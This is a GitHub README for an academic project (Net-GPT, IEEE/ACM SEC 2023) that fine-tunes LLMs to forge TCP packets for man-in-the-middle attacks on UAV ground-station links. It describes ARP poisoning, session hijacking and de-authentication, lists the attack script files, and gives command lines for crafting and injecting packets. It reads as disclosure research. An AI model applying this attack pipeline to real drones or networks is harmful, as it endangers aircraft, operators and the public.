Skip to content

OdatSec/Net-GPT

Net-GPT — LLM-Empowered MITM Chatbot for UAV

Net-GPT

A LLM-Empowered Man-in-the-Middle Chatbot for
Unmanned Aerial Vehicle

DOI IEEE Xplore MIT License Python 3.10+

GitHub Stars

Brett Piggott1  ·  Siddhant Patil2  ·  Guohuan Feng1  ·  Ibrahim Odat1  ·  Rajdeep Mukherjee1  ·  Balakrishnan Dharmalingam1  ·  Anyi Liu1
1Oakland University    2University of Wisconsin–Madison

Overview · Key Results · Architecture · Quick Start · Attacks · Fine-Tuning · Structure · Citation


🔥 News

  • [Dec 2023] 🏆  Paper presented at IEEE/ACM SEC 2023 — Symposium on Edge Computing, Wilmington, DE
  • [Nov 2023] 📄  Paper accepted at SEC'23 — Full research paper · DOI: 10.1145/3583740.3626809
  • [2023] 🔬  Research artifact and codebase publicly released

📖 Overview

"The convergence of Large Language Models with security systems transforms cybersecurity in the AI landscape."

Net-GPT is a research framework demonstrating a novel class of LLM-empowered offensive cyber-physical attacks against Unmanned Aerial Vehicle (UAV) communication systems. The system shows how finely-tuned Large Language Models can be weaponized to:

  • 🎯 Understand network protocols — LLMs learn TCP session structure through QLoRA fine-tuning on real packet captures
  • 🔀 Launch Man-in-the-Middle attacks — Adversarial UAVs intercept and impersonate benign UAV↔GCS communication
  • 📡 Generate mimicked network packets — Context-aligned counterfeit TCP packets generated in real-time via an edge server
  • Enable edge-computing deployment — Smaller LLMs (Distil-GPT-2) achieve 47× faster response time while retaining ~78% prediction capability

Threat Model

The adversary operates a malicious UAV that joins the same network as a benign UAV and its Ground Control Station (GCS). The malicious UAV leverages a nearby edge server equipped with fine-tuned LLMs to:

  1. Hijack the benign UAV via ARP poisoning, session hijacking, or de-authentication attacks
  2. Impersonate both endpoints by generating realistic TCP packets using LLM inference
  3. Maintain persistent session control using signaling packets (delayed ACK, DupACK, Keep-Alives)
 ┌──────────────┐         ┌──────────────┐         ┌──────────────┐
 │  Benign UAV  │◄───────►│ Malicious UAV│◄───────►│     GCS      │
 │   (Target)   │  MITM   │  (Attacker)  │  MITM   │  (Victim)    │
 └──────────────┘         └──────┬───────┘         └──────────────┘
                                 │
                          ┌──────▼───────┐
                          │  Edge Server  │
                          │  (RTX 4090)   │
                          │  Fine-tuned   │
                          │  LLM Engine   │
                          └──────────────┘

📊 Key Results

Generative Accuracy — Packet Field Prediction

Model Parameters Overall Accuracy Response Time
Llama-2-13B 13B 95.3% 108.3 s
Llama-2-7B 7B 94.1%
GPT-2 137M 74.2% (of 13B) 5.18 s (21× faster)
Distil-GPT-2 82M 77.9% (of 7B) 2.31 s (47× faster)

Per-Field Prediction Accuracy (Llama-2-13B, Best Config)

Field Src IP Dst IP Src Port Dst Port Flags Seq# Ack# Length
Accuracy 98.9% 98.9% 98.9% 98.9% 83.4% 96.2% 91.0% 99.0%

Error Analysis (Llama-2-13B)

Error Count 0 errors 1 error 2 errors 3–5 errors 6+ errors
Rate 76.2% 20.3% 1.9% 0% 1.6%

Over 76% of generated packets are error-free. When errors occur, 96.5% involve only a single field — easily correctable by the adversary.

Cost-Efficiency: Dataset Size vs. Training Epochs

Combination Dataset Epochs Accuracy (13B) Accuracy (7B)
Best 100K 2 96.5% 97.0%
Medium 60K 3 96.0% 96.2%
Low 20K 10 93.5% 92.8%

Larger datasets with fewer epochs consistently outperform smaller datasets with more epochs — key insight for edge-computing deployment strategies.


🏗️ System Architecture

Net-GPT operates in a two-phase attack pipeline:

Phase 1 — UAV Hijacking

Six attack methods targeting the PX4 autopilot communication layer:

Attack Method MITM Unauthorized Access Denial of Service
MAC Spoofing Layer 2 impersonation
Session Hijacking TCP session takeover
ARP Poisoning ARP cache corruption
Packet Injection Crafted packet insertion
Flooding Attack Resource exhaustion
De-authentication WiFi disassociation

Phase 2 — LLM-Powered Packet Generation

 ┌─────────────────────────────────────────────────────────────────────┐
 │                        FINE-TUNING PIPELINE                         │
 │                                                                     │
 │  Raw PCAP  ──►  tshark extract  ──►  JSON format  ──►  QLoRA tune  │
 │  (bigFlows)     (TCP sessions)      (#Previous,      (NF4 quant,   │
 │  368 MB         6,971 sessions      #Predicted,       8 batch,     │
 │  791K packets   100K packets        #Context)         2e-4 LR)     │
 └─────────────────────────────────────────────────────────────────────┘

 ┌─────────────────────────────────────────────────────────────────────┐
 │                        INFERENCE PIPELINE                           │
 │                                                                     │
 │  Intercepted  ──►  Edge Server  ──►  Fine-tuned  ──►  Scapy craft  │
 │  TCP packet       (RTX 4090)        LLM predict       Inject on    │
 │  from session     Format query      next packet       network      │
 └─────────────────────────────────────────────────────────────────────┘

Fine-Tuning Data Format

Each training entry follows a structured three-section template:

{
  "#Previous_Packet": {
    "Src_IP": "192.168.1.10",
    "Dst_IP": "192.168.1.20",
    "Src_Port": "54321",
    "Dst_Port": "80",
    "Flag": "ACK",
    "Seq": "1001",
    "Ack": "2001",
    "Length": "512"
  },
  "#Predicted_Packet": {
    "Src_IP": "192.168.1.20",
    "Dst_IP": "192.168.1.10",
    "Src_Port": "80",
    "Dst_Port": "54321",
    "Flag": "ACK PSH",
    "Seq": "2001",
    "Ack": "1513",
    "Length": "1024"
  },
  "#Context": "TCP_SESSION_ID:7042"
}

⚡ Quick Start

Requirements

Dependency Version Purpose
Python ≥ 3.10 Runtime
PyTorch ≥ 2.0 Model training & inference
Transformers ≥ 4.31 Hugging Face model loading
PEFT ≥ 0.4 QLoRA fine-tuning
bitsandbytes ≥ 0.40 NF4 quantization
Scapy ≥ 2.5 Network packet crafting
tshark ≥ 3.0 PCAP parsing
CUDA ≥ 11.8 GPU acceleration

1. Clone & Install

git clone https://github.com/OdatSec/Net-GPT.git
cd Net-GPT
pip install -r requirements.txt

2. Prepare Dataset

# Download and extract TCP sessions from PCAP
python src/data_preprocessing/pcap_extractor.py \
    --input data/raw/bigFlows.pcap \
    --output data/processed/train.json \
    --max-packets 100000

python src/data_preprocessing/pcap_extractor.py \
    --input data/raw/smallFlows.pcap \
    --output data/processed/test.json

3. Fine-Tune a Model

# Fine-tune Llama-2-13B with QLoRA (default config)
python src/fine_tuning/qlora_trainer.py \
    --model meta-llama/Llama-2-13b-hf \
    --dataset data/processed/train.json \
    --epochs 1 \
    --output models/llama2-13b-netgpt

# Fine-tune Distil-GPT-2 (edge deployment)
python src/fine_tuning/qlora_trainer.py \
    --model distilgpt2 \
    --dataset data/processed/train.json \
    --epochs 1 \
    --output models/distilgpt2-netgpt

4. Run Inference

# Generate predicted packets from intercepted sessions
python src/inference/predict.py \
    --model models/llama2-13b-netgpt \
    --input data/processed/test.json \
    --output results/predictions_llama2_13b.json

5. Evaluate Results

# Per-field accuracy evaluation
python src/inference/evaluate.py \
    --predictions results/predictions_llama2_13b.json \
    --ground-truth data/processed/test.json \
    --output results/evaluation_llama2_13b.json

6. Craft & Inject Packets (Controlled Lab Only)

# Generate Scapy-compatible packets from predictions
python src/packet_crafting/craft_packets.py \
    --predictions results/predictions_llama2_13b.json \
    --interface eth0

🔬 Fine-Tuning Methodology

QLoRA Configuration

Parameter Value Parameter Value
NF4 Quantization nf4 Logging steps 10
Batch size/device 8 Learning rate 2e-4
Gradient steps 12 Global grad norm 0.3
Paged Optimizer paged_adamw_32bit Warm-up ratio 0.03
Scheduler constant Epochs 1–10

Models Evaluated

Model Parameters HuggingFace ID Use Case
Llama-2-13B 13B meta-llama/Llama-2-13b-hf High-accuracy server deployment
Llama-2-7B 7B meta-llama/Llama-2-7b-hf Balanced accuracy/speed
GPT-2 137M gpt2 Compact edge deployment
Distil-GPT-2 82M distilgpt2 Ultra-fast edge deployment

Dataset Statistics

Property Fine-Tuning (bigFlows) Testing (smallFlows)
Size 368 MB 9.4 MB
Packets 791,615 14,261
Flows 40,686 1,209
Applications 132 28
Avg. Packet Size 449 bytes 646 bytes
Duration 5 minutes 5 minutes

🛡️ Attack Pipeline

ARP Poisoning — Layer 2 cache corruption

Corrupts ARP tables on both the target UAV and GCS, redirecting traffic through the malicious UAV. The attacker becomes an invisible relay, enabling full packet interception and modification.

Session Hijacking — TCP session takeover

Exploits the TCP three-way handshake to inject the attacker into an established session. Semi-session and full-session variants allow partial or complete control of the communication channel.

De-authentication — WiFi disassociation attack

Forces the benign GCS to disconnect from the network by sending spoofed de-authentication frames. The malicious UAV then establishes itself as the communication partner.

Packet Injection — Crafted packet insertion

After establishing MITM position, the adversary uses the fine-tuned LLM to generate and inject context-aligned TCP packets that mimic legitimate UAV↔GCS communication patterns.


📁 Repository Structure

Net-GPT/
│
├── 📂 src/                              Source code package
│   ├── data_preprocessing/
│   │   ├── pcap_extractor.py           Extract TCP sessions from PCAP files
│   │   ├── session_parser.py           Parse and structure TCP sessions
│   │   └── json_formatter.py           Format data for fine-tuning
│   │
│   ├── fine_tuning/
│   │   ├── qlora_trainer.py            QLoRA fine-tuning pipeline
│   │   ├── dataset_loader.py           Custom dataset for packet prediction
│   │   └── train_config.py             Training hyperparameter configs
│   │
│   ├── inference/
│   │   ├── predict.py                  Generate packet predictions
│   │   ├── evaluate.py                 Per-field accuracy evaluation
│   │   └── benchmark.py               Response time benchmarking
│   │
│   ├── attacks/
│   │   ├── arp_poisoning.py            ARP cache poisoning implementation
│   │   ├── session_hijack.py           TCP session hijacking
│   │   ├── deauth_attack.py            WiFi de-authentication
│   │   └── mitm_controller.py          MITM orchestration engine
│   │
│   └── packet_crafting/
│       ├── craft_packets.py            Scapy-based packet construction
│       └── session_replayer.py         TCP session replay engine
│
├── 📂 configs/
│   ├── qlora_llama2_13b.yaml          Llama-2-13B fine-tuning config
│   ├── qlora_llama2_7b.yaml           Llama-2-7B fine-tuning config
│   ├── qlora_gpt2.yaml                GPT-2 fine-tuning config
│   └── qlora_distilgpt2.yaml          Distil-GPT-2 fine-tuning config
│
├── 📂 data/
│   ├── raw/                           Raw PCAP captures (user-supplied)
│   └── processed/                     Processed JSON for training/testing
│
├── 📂 models/                          Fine-tuned model checkpoints
│
├── 📂 results/                         Experiment outputs and evaluations
│
├── 📂 figures/                         Paper figures and visualizations
│
├── 📂 docs/
│   ├── METHODOLOGY.md                 Detailed methodology documentation
│   ├── RESULTS.md                     Comprehensive results tables
│   └── EDGE_DEPLOYMENT.md            Edge computing deployment guide
│
├── 📂 scripts/
│   ├── run_all_experiments.sh         Reproduce all paper results
│   ├── evaluate_all_models.sh         Batch evaluation script
│   └── download_dataset.sh           Dataset download helper
│
├── .gitignore                         Git ignore rules
├── CITATION.cff                       Machine-readable citation metadata
├── CONTRIBUTING.md                    Contribution guidelines
├── LICENSE                            MIT License
├── README.md                          This file
├── SECURITY.md                        Security policy & responsible use
└── requirements.txt                   Python dependencies

📐 Research Questions & Findings

The paper systematically investigates three research questions:

RQ1: Does model size significantly improve effectiveness?

Finding: Llama-2-13B (95.3%) marginally outperforms Llama-2-7B (94.1%). The 1.2% gap is surprisingly small given the 2× parameter difference, suggesting model architecture matters more than raw parameter count for protocol understanding tasks.

RQ2: What balances dataset quantity vs. training epochs?

Finding: 100K packets with 2 epochs produces the best accuracy for both models. Larger datasets remarkably improve the Flags field prediction — critical for sustaining communication sessions. More epochs do not improve smaller LLMs and may even degrade performance.

RQ3: Can smaller LLMs produce comparable results?

Finding: Distil-GPT-2 (82M params) achieves 77.9% of Llama-2-7B's capability while being 47× faster (2.31s vs. 108.3s). This enables real-time edge deployment on resource-constrained mobile platforms — crucial for adversarial field operations.


🔄 Reproducibility

All experiments are fully reproducible:

# Reproduce all paper results end-to-end
bash scripts/run_all_experiments.sh

# Reproduce specific model evaluation
python src/inference/evaluate.py \
    --model-name llama2-13b \
    --dataset-sizes 20000 40000 60000 80000 100000 \
    --epochs 1
Artifact Path Description
Training data data/processed/train.json 100K packets from bigFlows
Test data data/processed/test.json 14,261 packets from smallFlows
Model configs configs/*.yaml QLoRA hyperparameters per model
Results results/ Per-field accuracy JSON per experiment

⚠️ Ethics & Responsible Use

All experiments were conducted in an isolated laboratory environment with UAVs operating under the PX4 autopilot simulation framework. No real airspace, operational networks, production UAV systems, or public wireless infrastructure was involved at any stage of this research.

The attack implementations in this repository are disclosed as part of responsible academic vulnerability research demonstrating how adversarial LLM capabilities extend to network-level physical systems. The intent is to motivate the design of LLM-aware network security defenses for UAV communication infrastructure.

⛔ Do not deploy any attack component against real aircraft, live airspace, operational networks, or systems you do not own and have explicit authorization to test.

This research was reviewed and approved by the institutional review process at Oakland University.

See SECURITY.md for the full security policy.


📝 Citation

If Net-GPT contributes to your research, please cite:

@inproceedings{piggott2023netgpt,
  title     = {{Net-GPT}: A {LLM}-Empowered Man-in-the-Middle Chatbot for
               Unmanned Aerial Vehicle},
  author    = {Piggott, Brett and Patil, Siddhant and Feng, Guohuan and
               Odat, Ibrahim and Mukherjee, Rajdeep and
               Dharmalingam, Balakrishnan and Liu, Anyi},
  booktitle = {Proceedings of the 2023 IEEE/ACM Symposium on Edge Computing (SEC)},
  year      = {2023},
  pages     = {287--293},
  publisher = {ACM},
  address   = {Wilmington, DE, USA},
  doi       = {10.1145/3583740.3626809},
  isbn      = {979-8-4007-0123-8}
}

A CITATION.cff file is included for GitHub's automatic citation tool.


🔗 Related Work

Project Venue Relationship
AeroMind RAID 2026 Memory-poisoning attacks on LLM-driven UAV agents (follow-up work)
Heterogeneous Generative Dataset for UASes IEEE MOST 2023 Foundational UAV dataset work

📬 Contact

Author Affiliation Role
Brett Piggott Oakland University Lead developer
Siddhant Patil University of Wisconsin–Madison Contributor
Guohuan Feng Oakland University Contributor
Ibrahim Odat Oakland University Contributor
Rajdeep Mukherjee Oakland University Contributor
Balakrishnan Dharmalingam Oakland University Contributor
Anyi Liu Oakland University Principal Investigator

Net-GPT · IEEE/ACM SEC 2023 · Oakland University · University of Wisconsin–Madison
Released under the MIT License

About

Net-GPT: A LLM-Empowered Man-in-the-Middle Chatbot for Unmanned Aerial Vehicle — IEEE/ACM SEC 2023 | DOI: 10.1145/3583740.3626809

Topics

Resources

License

Code of conduct

Contributing

Security policy

Stars

Watchers

Forks

Releases

No releases published

Packages

 
 
 

Contributors